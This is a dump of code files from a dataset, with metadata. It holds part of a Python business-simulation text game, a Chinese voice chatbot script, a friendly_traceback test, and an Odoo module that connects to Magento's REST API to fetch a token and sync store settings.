(\" + Fore.GREEN + \"RM\" + str(Kelantan_price) + Fore.RESET + \")\")\r\n print(\"8. Go back to the Main Menu\")\r\n new_location = input(\">> \")\r\n\r\n ################################################################################################################\r\n\r\n # Penang\r\n if new_location == \"1\":\r\n if money < Penang_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Penang\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Penang\"\r\n money = money - Penang_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Penang_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +100\")\r\n customers = customers + 100\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Johor\r\n if new_location == \"2\":\r\n if money < Johor_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Johor\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Johor\"\r\n money = money - Johor_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Johor_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +150\")\r\n customers = customers + 150\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! 
Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Pahang\r\n if new_location == \"3\":\r\n if money < Pahang_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Pahang \":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Pahang \"\r\n money = money - Pahang_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Pahang_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +200\")\r\n customers = customers + 200\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Kedah\r\n if new_location == \"4\":\r\n if money < Kedah_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Kedah\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Kedah\"\r\n money = money - Kedah_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Kedah_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +250\")\r\n customers = customers + 250\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Perlis\r\n if new_location == \"5\":\r\n if money < Perlis_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Perlis\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Perlis\"\r\n money = money - Perlis_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Perlis_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +300\")\r\n customers = customers + 300\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! 
Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Negeri Sembilan\r\n if new_location == \"6\":\r\n if money < NegeriSembilan_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Negeri Sembilan\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Negeri Sembilan\"\r\n money = money - NegeriSembilan_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(NegeriSembilan_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +350\")\r\n customers = customers + 350\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Kelantan\r\n if new_location == \"7\":\r\n if money < Kelantan_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Kelantan\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Kelantan\"\r\n money = money - Kelantan_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Kelantan_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +400\")\r\n customers = customers + 400\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! 
Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if new_location == \"8\":\r\n print(\"Going back to the main menu\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Going to work\r\n if choice == \"6\":\r\n print(\"Driving to work...\")\r\n time.sleep(2)\r\n GetToWork()\r\n\r\n\r\nMenu()\r\n\r\n################################################################################################################","sub_path":"bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":36499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"145017559","text":"from gtts import gTTS\nfrom pygame import mixer\nimport tempfile\nimport speech_recognition\nimport time \n\n\n\n\n\nresume = open('resume.txt',encoding='cp950')\nresumedata = resume.read()\n\n\n\na = [\"火龍火龍\",\"\",\"火龍火龍火龍很煩的說\"]\n\n\n#listenfile = 0\n#def chat_map_character_pika\n#def chat_map_character_jney\n#def chat_map_character_seed\n\n\n\ndef function_listen():\n read = speech_recognition.Recognizer()\n\n with speech_recognition.Microphone() as source:\n read.adjust_for_ambient_noise(source)\n audio_data1 = read.listen(source)\n \n return read.recognize_google(audio_data1, language='zh-TW')\n#function_listen()\n#print(function_listen())\n\n\n\n\ndef recognize(word, a): \n if (\"皮卡\" in word):\n a[0] = \"皮卡皮卡\"\n a[2] = \"皮卡皮卡皮卡很煩的說\"\n elif (\"種子\" in word):\n a[0] = \"種子種子\"\n a[2] = \"種子種子種子很煩的說\" \n elif (\"傑尼\" in word):\n a[0] = \"傑尼傑尼\"\n a[2] = \"傑尼傑尼傑尼很煩的說\"\n a[1] = word\n return a\n\ndef function_speak(speaking):\n with tempfile.NamedTemporaryFile(delete=True) as f:\n mixer.init()\n words = gTTS(text=str(recognize(speaking,a)), lang=\"zh\")\n# words.save(\"f.name.mp3\")\n# mixer.music.load(\"f.name.mp3\") \n words.save(\"{0}.mp3\".format(f.name))\n mixer.music.load(\"{0}.mp3\".format(f.name))\n mixer.music.play()\n\n\n\n\n#################### \n\ndef chat_map_speak(response_words, time_sleep, chat_map_response):\n time.sleep(1)\n print(response_words)\n function_speak(response_words)\n time.sleep(time_sleep)\n listenfile = function_listen()\n print(\"您剛剛說:『\",listenfile,\"』嗎,讓我想一下怎麼回答\")\n function_speak(\"您剛剛說:\"+listenfile+\"嗎,讓我想一下怎麼回答\")\n time.sleep(10)\n chat_map_response(listenfile)\n\n\n\n\ndef chat_map_speak_re(last_voice, time_sleep, chat_map_response):\n time.sleep(1)\n print(\"我想很久說還是不懂說,不好意思您剛剛說的話是:『\",last_voice,\"』齁?,抱歉聽得不是很清楚請可以麻煩大大再說一次ㄇ\")\n function_speak(\"我想很久說還是不懂說,不好意思您剛剛說的話是:\"+last_voice+\"齁?,抱歉聽得不是很清楚可以麻煩大大再說一次ㄇ\")\n time.sleep(time_sleep)\n listenfile = function_listen()\n print(\"您剛剛說:『\",listenfile,\"』嗎,讓我想一下怎麼回答\")\n function_speak(\"您剛剛說:\"+listenfile+\"嗎,讓我想一下怎麼回答\")\n time.sleep(10)\n chat_map_response(listenfile) \n\n\n \n\ndef chat_map_speak_init():\n time.sleep(1)\n chat_map_init =\"你好 太陽公公說你好 你好你好你好我ㄇ開始洗頻你囉 我是域設總機小火龍 請問有什麼事情嗎\"\n print(chat_map_init)\n function_speak(chat_map_init)\n time.sleep(15)\n listenfile = function_listen()\n print(\"你說的話是:『\",listenfile,\"』對齁\")\n function_speak(\"你說的話是:\"+listenfile+\"對齁\")\n time.sleep(10)\n chat_map_response_0(listenfile)\n\n\n\n\n#================================\n\n\n\ndef chat_map_response_0(voice):\n if (\"喵\" in voice):\n chat_map_speak(\"安安你好我是喵號對話,請你根據每個情境環節喵喵看看,喵就會喵喵窩\", 10, chat_map_response_0)\n elif (\"皮卡\" in voice): \n chat_map_speak(\"維您好我是皮卡丘 不好意思我剛剛不在 現在才回到位置上 請問您找我有什麼事情嗎\", 12, chat_map_response_0) \n elif (\"種子\" in voice):\n 
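
# --- Editor's aside (hedged sketch, not the original control flow) ----------
# chat_map_response_0's long elif chain pairs a keyword with a reply, a wait
# time and the next handler. The same dispatch can be table-driven; the keys
# and replies here are illustrative stand-ins:
_RESPONSES = {
    "12345": ("Hello, I am dialogue map 5", 15, "chat_map_response_0"),
    "1": ("Hello, I am dialogue map 1", 10, "chat_map_response_1"),
    "2": ("Hello, I am dialogue map 2", 10, "chat_map_response_2"),
}

def dispatch(voice, responses=_RESPONSES):
    # check longer keywords first, since e.g. "12345" also contains "1"
    for keyword in sorted(responses, key=len, reverse=True):
        if keyword in voice:
            return responses[keyword]
    return None  # caller falls back to the "please say it again" retry prompt
# -----------------------------------------------------------------------------
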
chat_map_speak(\"維您好我是妙蛙種子 不好意思我剛剛不在 現在才回到位置上 請問您找我有什麼事情嗎\", 12, chat_map_response_0) \n elif (\"傑尼\" in voice):\n chat_map_speak(\"維您好我是傑尼龜 不好意思我剛剛不在 現在才回到位置上 請問您找我有什麼事情嗎\", 12, chat_map_response_0) \n elif (\"1\" in voice):\n chat_map_speak(\"安安你好我是1號對話地圖,請你根據1號設定的情境環節說話看看,我就會回答窩\", 10, chat_map_response_1)\n elif (\"2\" in voice):\n chat_map_speak(\"安安你好我是2號對話地圖,請你根據2號設定的情境環節說話看看,我就會回答窩\", 10, chat_map_response_2)\n elif (\"3\" in voice):\n chat_map_speak(\"安安你好我是3號對話地圖,請你根據3號設定的情境環節說話看看,我就會回答窩\", 10, chat_map_response_3)\n elif (\"你好嗎\" in voice):\n chat_map_speak(\"安安你好我是4號對話地圖,我是對應當你說你好嗎時候的4號隱藏版答案隱藏版隱藏版隱藏版窩 你剛剛縮的你好嗎很標準我聽懂樂ㄛ\", 15, chat_map_response_0) \n elif (\"12345\" in voice): \n chat_map_speak(\"安安你好我是5號對話地圖,1234566666666 你剛剛縮的12345很666我聽懂樂ㄛ,抱歉5號環節以及以下的分支主人還沒設定窩\", 15, chat_map_response_0)\n elif (\"6\" in voice): \n chat_map_speak(\"安安你好我是6號對話地圖,請你根據6號設定的情境環節說話看看,我就會回答窩,抱歉6號環節以及以下的分支主人還沒設定窩\", 15, chat_map_response_0) \n elif (\"787878\" in voice):\n chat_map_speak(\"安安你好我是7號對話地圖,787878的三號三三三三答案嘻嘻 嘻嘻 嘻嘻嘻嘻嘻嘻,你剛剛縮的78很標準我聽懂樂ㄛ,抱歉7號環節以及以下的分支主人還沒設定窩\", 20, chat_map_response_0) \n elif (\"878787\" in voice):\n chat_map_speak(\"安安你好我是8號對話地圖,878787 = 8號答案誇獎我誇獎我誇獎我誇獎我誇獎我,你剛剛縮的87很標準我聽懂樂ㄛ,抱歉8號環節以及以下的分支主人還沒設定窩\", 20, chat_map_response_0) \n elif (\"9\" in voice):\n chat_map_speak(\"安安你好我是9號對話地圖,請你根據9號設定的情境環節說話看看,我就會回答窩,抱歉9號環節以及以下的分支主人還沒設定窩\", 15, chat_map_response_0) \n elif (\"0\" in voice):\n chat_map_speak(\"安安你好我是0號對話地圖,請你根據0號設定的情境環節說話看看,我就會回答窩,抱歉0號環節以及以下的分支主人還沒設定窩\", 15, chat_map_response_0) \n elif (\"自我介紹\" in voice):\n chat_map_speak(resume, 150, chat_map_response_0) \n elif (\"唱國歌\" in voice):\n chat_map_speak(\"張雅茹宇宙最聰明可愛善良天才美麗了 茹茹宇宙最棒最可愛了\", 10, chat_map_response_0) \n else: \n chat_map_speak_re(voice, 18, chat_map_response_0)\n\n\ndef chat_map_response_1(voice):\n if (\"11\" in voice):\n chat_map_speak(\"安安你好我是1-1號對話,請你根據1-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_1_1)\n elif (\"12\" in voice):\n chat_map_speak(\"安安你好我是1-2號對話,請你根據1-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"13\" in voice):\n chat_map_speak(\"安安你好我是1-3號對話,請你根據1-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_0(voice)\n\n\ndef chat_map_response_2(voice):\n if (\"21\" in voice):\n chat_map_speak(\"安安你好我是2-1號對話,請你根據2-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2_1)\n elif (\"22\" in voice):\n chat_map_speak(\"安安你好我是2-2號對話,請你根據2-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"23\" in voice):\n chat_map_speak(\"安安你好我是2-3號對話,請你根據2-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_0(voice)\n\ndef chat_map_response_3(voice):\n if (\"31\" in voice):\n chat_map_speak(\"安安你好我是3-1號對話,請你根據3-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_1)\n elif (\"32\" in voice):\n chat_map_speak(\"安安你好我是3-2號對話,請你根據3-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"33\" in voice):\n chat_map_speak(\"安安你好我是3-3號對話,請你根據3-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_0(voice)\n\ndef chat_map_response_1_1(voice):\n if (\"111\" in voice):\n chat_map_speak(\"安安你好我是1-1-1號對話,請你根據1-1-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_1_1_1)\n elif (\"112\" in voice):\n chat_map_speak(\"安安你好我是1-1-2號對話,請你根據1-1-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"113\" in voice):\n chat_map_speak(\"安安你好我是1-1-3號對話,請你根據1-1-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_1(voice)\n\ndef chat_map_response_2_1(voice):\n if (\"211\" in voice):\n 
chat_map_speak(\"安安你好我是2-1-1號對話,請你根據2-1-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_1)\n elif (\"212\" in voice):\n chat_map_speak(\"安安你好我是2-1-2號對話,請你根據2-1-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"213\" in voice):\n chat_map_speak(\"安安你好我是2-1-3號對話,請你根據2-1-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_2(voice)\n\n\n\n\ndef chat_map_response_1_1_1(voice):\n if (\"1111\" in voice):\n chat_map_speak(\"安安你好我是1-1-1-1號對話,請你根據1-1-1-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_0)\n elif (\"1112\" in voice):\n chat_map_speak(\"安安你好我是1-1-1-2號對話,請你根據1-1-1-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_0)\n elif (\"1113\" in voice):\n chat_map_speak(\"安安你好我是1-1-1-3號對話,請你根據1-1-1-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_0)\n else:\n chat_map_response_1_1(voice)\n\n\n\n\n\n\n\nchat_map_speak_init()\n\n\n\n","sub_path":"chat_project/chat/chat_test_ver1.py","file_name":"chat_test_ver1.py","file_ext":"py","file_size_in_byte":10963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356196736","text":"import friendly_traceback\nimport sys\n\n\ndef test_name_error():\n try:\n from . import raise_name_error # for pytest\n except ImportError:\n import raise_name_error\n\n try:\n raise_name_error.test()\n except Exception:\n friendly_traceback.explain(*sys.exc_info(), redirect=\"capture\")\n result = friendly_traceback.get_output()\n assert \"NameError: name 'c' is not defined\" in result\n return result\n\n\ndef test_flush():\n try:\n from . import raise_name_error # for pytest\n except ImportError:\n import raise_name_error\n\n try:\n raise_name_error.test()\n except Exception:\n friendly_traceback.explain(*sys.exc_info(), redirect=\"capture\")\n result = friendly_traceback.get_output(flush=False)\n assert \"NameError: name 'c' is not defined\" in result\n result = friendly_traceback.get_output() # flushes\n result = friendly_traceback.get_output() # returns empty list\n assert not result\n\n\nif __name__ == \"__main__\":\n result = test_name_error()\n print(result)\n","sub_path":"tests/catch_name_error.py","file_name":"catch_name_error.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12889592","text":"# -*- coding: utf-8 -*-\n##########################################################################\n#\n# Copyright (c) 2015-Present Webkul Software Pvt. Ltd. 
()\n# See LICENSE file for full copyright and licensing details.\n# License URL : \n#\n##########################################################################\n\nimport json\nimport re\n\nimport requests\n\nfrom odoo import _, api, fields, models\nfrom odoo.addons.base.res.res_partner import _lang_get\nfrom odoo.exceptions import UserError\nfrom odoo.http import request\n\nXMLRPC_API = '/integration/admin/token'\n\n\nclass MagentoConfigure(models.Model):\n _name = \"magento.configure\"\n _inherit = ['mail.thread']\n _description = \"Magento Configuration\"\n _rec_name = 'instance_name'\n\n def _default_instance_name(self):\n return self.env[\n 'ir.sequence'].next_by_code('magento.configure')\n\n def _default_category(self):\n ctx = dict(self._context or {})\n categId = ctx.get('categ_id', False)\n if categId:\n return categId\n try:\n return self.env['ir.model.data'].get_object_reference(\n 'product', 'product_category_all')[1]\n except ValueError:\n return False\n\n def _fetch_magento_store(self, url, token):\n storeInfo = {}\n storeObj = self.env['magento.store.view']._get_store_view(url, token)\n storeInfo['store_id'] = storeObj\n return storeInfo\n\n name = fields.Char(\n string='Base URL',\n track_visibility=\"onchange\",\n required=True,\n )\n instance_name = fields.Char(\n string='Instance Name',\n default=lambda self: self._default_instance_name())\n user = fields.Char(\n string='User Name',\n track_visibility=\"onchange\",\n required=True)\n pwd = fields.Char(\n string='Password',\n track_visibility=\"onchange\",\n required=True,\n size=100)\n token = fields.Char(string='Token', size=100)\n status = fields.Char(string='Connection Status Message', readonly=True)\n active = fields.Boolean(\n string=\"Active\",\n track_visibility=\"onchange\",\n default=True)\n connection_status = fields.Boolean(\n string=\"Connection Status\", default=False)\n store_id = fields.Many2one(\n 'magento.store.view', string='Default Magento Store')\n group_id = fields.Many2one(\n related=\"store_id.group_id\",\n string=\"Default Store\",\n readonly=True,\n store=True)\n website_id = fields.Many2one(\n related=\"group_id.website_id\",\n string=\"Default Magento Website\",\n readonly=True)\n credential = fields.Boolean(\n string=\"Show/Hide Credentials Tab\",\n default=lambda *a: 1,\n help=\"If Enable, Credentials tab will be displayed, \"\n \"And after filling the details you can hide the Tab.\")\n notify = fields.Boolean(\n string='Notify Customer By Email',\n default=lambda *a: 1,\n help=\"If True, customer will be notify\"\n \"during order shipment and invoice, else it won't.\")\n language = fields.Selection(\n _lang_get, string=\"Default Language\", default=api.model(\n lambda self: self.env.lang), help=\"Selected language is loaded in the system, \"\n \"all documents related to this contact will be synched in this language.\")\n category = fields.Many2one(\n 'product.category',\n string=\"Default Category\",\n default=lambda self: self._default_category(),\n help=\"Selected Category will be set default category for odoo's product, \"\n \"in case when magento product doesn\\'t belongs to any catgeory.\")\n state = fields.Selection([\n ('enable','Enable'),\n ('disable','Disable')\n ],\n string='Status',\n default=\"enable\",\n help=\"status will be consider during order invoice, \"\n \"order delivery and order cancel, to stop asynchronous process at other end.\",\n size=100)\n inventory_sync = fields.Selection([\n ('enable','Enable'),\n ('disable','Disable')\n ],\n string='Inventory Update',\n 
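
# --- Editor's aside (hedged sketch of the handshake used below) -------------
# create_magento_connection() posts the admin credentials to
# <base>/index.php/rest/V1/integration/admin/token and sends the returned
# token back as a Bearer header. A minimal standalone version (base_url,
# username and password are placeholders):
import json
import requests

def get_admin_token(base_url, username, password):
    url = base_url.rstrip("/") + "/index.php/rest/V1/integration/admin/token"
    resp = requests.post(
        url,
        data=json.dumps({"username": username, "password": password}),
        headers={"Content-Type": "application/json"},
        verify=False,  # mirrors the module's own call; verify certs in production
    )
    resp.raise_for_status()
    return "Bearer " + resp.json()  # Magento returns the bare token string as JSON
# -----------------------------------------------------------------------------
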
default=\"enable\",\n help=\"If Enable, Invetory will Forcely Update During Product Update Operation.\",\n size=100)\n warehouse_id = fields.Many2one(\n 'stock.warehouse',\n string='Warehouse',\n default=lambda self: self.env['sale.order']._default_warehouse_id(),\n help=\"Used During Inventory Synchronization From Magento to Odoo.\")\n location_id = fields.Many2one(\n related='warehouse_id.lot_stock_id', string='Location')\n create_date = fields.Datetime(string='Created Date')\n correct_mapping = fields.Boolean(string='Correct Mapping', default=True)\n\n @api.model\n def create(self, vals):\n if 'name' in vals:\n frontEnd = vals.get('name', '').strip('/')\n vals['name'] = frontEnd\n activeConnections = self.search([('active', '=', True)])\n isMultiMobInstalled = False\n if self.env['ir.module.module'].sudo().search(\n [('name', 'in', ['odoo_magento_multi_instance', 'mob_hybrid_multi_instance'])], limit=1).state == 'installed':\n isMultiMobInstalled = True\n if vals.get('active') and activeConnections and not isMultiMobInstalled:\n raise UserError(\n _('Warning!\\nSorry, Only one active connection is allowed.'))\n if not vals.get('instance_name', False):\n vals['instance_name'] = self.env[\n 'ir.sequence'].next_by_code('magento.configure')\n res = super(MagentoConfigure, self).create(vals)\n self.env['mob.dashboard']._create_dashboard(res)\n return res\n\n @api.multi\n def write(self, vals):\n if 'name' in vals:\n frontEnd = vals.get('name', '').strip('/')\n vals['name'] = frontEnd\n activeConnections = self.search([('active', '=', True)])\n isMultiMobInstalled = False\n dashboardModel = self.env['mob.dashboard']\n if self.env['ir.module.module'].sudo().search(\n [('name', 'in', ['odoo_magento_multi_instance', 'mob_hybrid_multi_instance'])], limit=1).state == 'installed':\n isMultiMobInstalled = True\n if vals:\n if len(activeConnections) > 0 and vals.get(\n 'active') and not isMultiMobInstalled:\n raise UserError(\n _('Warning!\\nSorry, Only one active connection is allowed.'))\n for instanceObj in self:\n if (vals.get('name') and vals['name'] != instanceObj.name) or \\\n (vals.get('user') and vals['user'] != instanceObj.user) or \\\n (vals.get('pwd') and vals['pwd'] != instanceObj.pwd):\n token = instanceObj.create_magento_connection(vals)\n if token:\n if len(token[0]) > 1:\n if token[0][0]:\n vals['token'] = str(token[0][0])\n vals[\n 'status'] = \"Congratulation, It's Successfully Connected with Magento Api.\"\n vals['connection_status'] = True\n else:\n vals['token'] = False\n vals['status'] = str(token[0][1])\n vals['connection_status'] = False\n if not instanceObj.instance_name:\n vals['instance_name'] = self.env[\n 'ir.sequence'].next_by_code('magento.configure')\n isDashboardExist = dashboardModel.with_context(\n active_test=False).search([('instance_id', '=', self.id)])\n if not isDashboardExist:\n dashboardModel._create_dashboard(instanceObj)\n return super(MagentoConfigure, self).write(vals)\n\n @api.multi\n def set_default_magento_website(self, url, token):\n for obj in self:\n storeId = obj.store_id\n ctx = dict(self._context or {})\n ctx['instance_id'] = obj.id\n if not storeId:\n storeInfo = self.with_context(\n ctx)._fetch_magento_store(url, token)\n if not storeInfo:\n raise UserError(\n _('Error!\\nMagento Default Website Not Found!!!'))\n return True\n\n #############################################\n ## magento connection ##\n #############################################\n @api.multi\n def test_connection(self):\n token = 0\n connectionStatus = False\n status = 
'Magento Connection Un-successful'\n text = 'Test connection Un-successful please check the magento login credentials !!!'\n checkMapping = self.correct_mapping\n token = self.create_magento_connection()\n if token:\n if len(token[0]) > 1:\n if token[0][0]:\n self.token = str(token[0][0])\n storeId = self.set_default_magento_website(\n self.name, self.token)\n text = str(token[0][1])\n status = \"Congratulation, It's Successfully Connected with Magento.\"\n connectionStatus = True\n else:\n status = str(token[0][1])\n self.status = status\n res_model = 'message.wizard'\n partial = self.env['message.wizard'].create({'text': text})\n view_id = self.env.ref('odoo_magento_connect.message_wizard_form1').id\n if not self.store_id and connectionStatus:\n partial = self.env['magento.wizard'].create(\n {'magento_store_view': self.store_id.id})\n view_id = self.env.ref(\n 'odoo_magento_connect.id_magento_wizard_form').id\n res_model = 'magento.wizard'\n if checkMapping:\n self.correct_instance_mapping()\n ctx = dict(self._context or {})\n ctx['text'] = text\n ctx['instance_id'] = self.id\n self.connection_status = connectionStatus\n return {'name': (\"Odoo Magento Bridge\"),\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_model': res_model,\n 'view_id': view_id,\n 'res_id': partial.id,\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'context': ctx,\n 'target': 'new',\n }\n\n @api.model\n def _create_connection(self):\n \"\"\" create a connection between Odoo and magento \n returns: False or list\"\"\"\n instanceId = self._context.get('instance_id', False)\n token = ''\n if instanceId:\n instanceObj = self.browse(instanceId)\n else:\n activeConnections = self.search([('active', '=', True)])\n if len(activeConnections) > 1:\n raise UserError(\n _('Error!\\nSorry, only one Active Configuration setting is allowed.'))\n if not activeConnections:\n raise UserError(\n _('Error!\\nPlease create the configuration part for Magento connection!!!'))\n else:\n instanceObj = activeConnections[0]\n token_generation = instanceObj.create_magento_connection()\n if token_generation:\n if len(token_generation[0]) > 1:\n if token_generation[0][0]:\n instanceObj.token = token_generation[0][0]\n token = token_generation[0][0]\n if token:\n return [instanceObj.name, token, instanceObj.id]\n else:\n return False\n\n @api.one\n def create_magento_connection(self, vals={}):\n text, token = '', ''\n url = self.name + \"/index.php/rest/V1\" + XMLRPC_API\n user = self.user\n pwd = self.pwd\n if vals:\n if vals.get('name'):\n url = vals['name'] + \"/index.php/rest/V1\" + XMLRPC_API\n if vals.get('user'):\n user = vals['user']\n if vals.get('pwd'):\n pwd = vals['pwd']\n Cre = {\n \"username\": user,\n \"password\": pwd\n }\n Cred = json.dumps(Cre)\n headers = {'Content-Type': 'application/json'}\n try:\n userAgent = request.httprequest.environ.get('HTTP_USER_AGENT', '')\n headers.update({'User-Agent': userAgent})\n except Exception as e:\n pass\n try:\n responseApi = requests.post(url, data=Cred, headers=headers, verify=False)\n response = json.loads(responseApi.text)\n if responseApi.ok :\n token = \"Bearer \" + response\n text = 'Test Connection with magento is successful, now you can proceed with synchronization.'\n else :\n text = ('Magento Connection Error: %s') % response.get('message')\n except Exception as e:\n text = ('Error!\\nMagento Connection Error: %s') % e\n return [token, text]\n\n @api.model\n def fetch_connection_info(self, vals):\n \"\"\"\n Called by Xmlrpc from Magento\n \"\"\"\n if 
vals.get('magento_url'):\n activeConnections = self.search([('active', '=', True)])\n isMultiMobInstalled = self.env['ir.module.module'].sudo().search(\n [('name', 'in', ['odoo_magento_multi_instance', 'mob_hybrid_multi_instance']), (\"state\", \"=\", \"installed\")])\n if isMultiMobInstalled:\n magentoUrl = re.sub(r'^https?:\\/\\/', '', vals.get('magento_url'))\n magentoUrl = re.split('index.php', magentoUrl)[0]\n for connectionObj in activeConnections:\n act = connectionObj.name\n act = re.sub(r'^https?:\\/\\/', '', act)\n if magentoUrl == act or magentoUrl[:-1] == act:\n return connectionObj.read(\n ['language', 'category', 'warehouse_id'])[0]\n else:\n for connectionObj in activeConnections:\n return connectionObj.read(\n ['language', 'category', 'warehouse_id'])[0]\n return False\n\n @api.model\n def correct_instance_mapping(self):\n self.mapped_status(\"magento.product\")\n self.mapped_status(\"magento.product.template\")\n self.mapped_status(\"wk.order.mapping\")\n self.mapped_status(\"magento.customers\")\n self.mapped_status(\"magento.product.attribute.value\")\n 